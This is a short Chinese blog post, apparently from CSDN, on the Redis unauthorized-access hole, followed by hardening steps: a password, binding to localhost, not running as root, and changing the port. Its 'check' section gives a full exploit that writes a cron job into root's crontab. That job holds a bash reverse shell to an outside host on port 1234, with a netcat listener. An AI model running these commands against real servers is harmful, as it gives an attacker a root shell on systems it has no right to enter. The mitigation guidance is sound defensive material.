本文介绍了如何通过Redis命令检查远程Redis服务器的安全漏洞,并提供了一种利用Redis进行攻击的方法示例。此外,还提供了修复这些漏洞的具体步骤,包括设置访问密码、限制连接IP以及避免使用root权限启动Redis等。
检查漏洞:
redis-cli -h remoteip 连接远程redis
config set dir /var/spool/cron 设置目录
config set dbfilename root 设置配置文件
set 1 “\n\n\n* * * * * bash -i >& /dev/tcp/www.nxadmin.com/1234 0>&1\n\n\n”
如果删除del 1
save 保存
netcat -l -vv -p 1234 设置监听
修复漏洞:
redis.conf 中配置requirepass项,增加复杂的访问密码
redis.conf :bind 127.0.0.1
限定可以连接redis服务器的ip
禁止使用root权限启动redis服务
修改redis默认端口6379
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
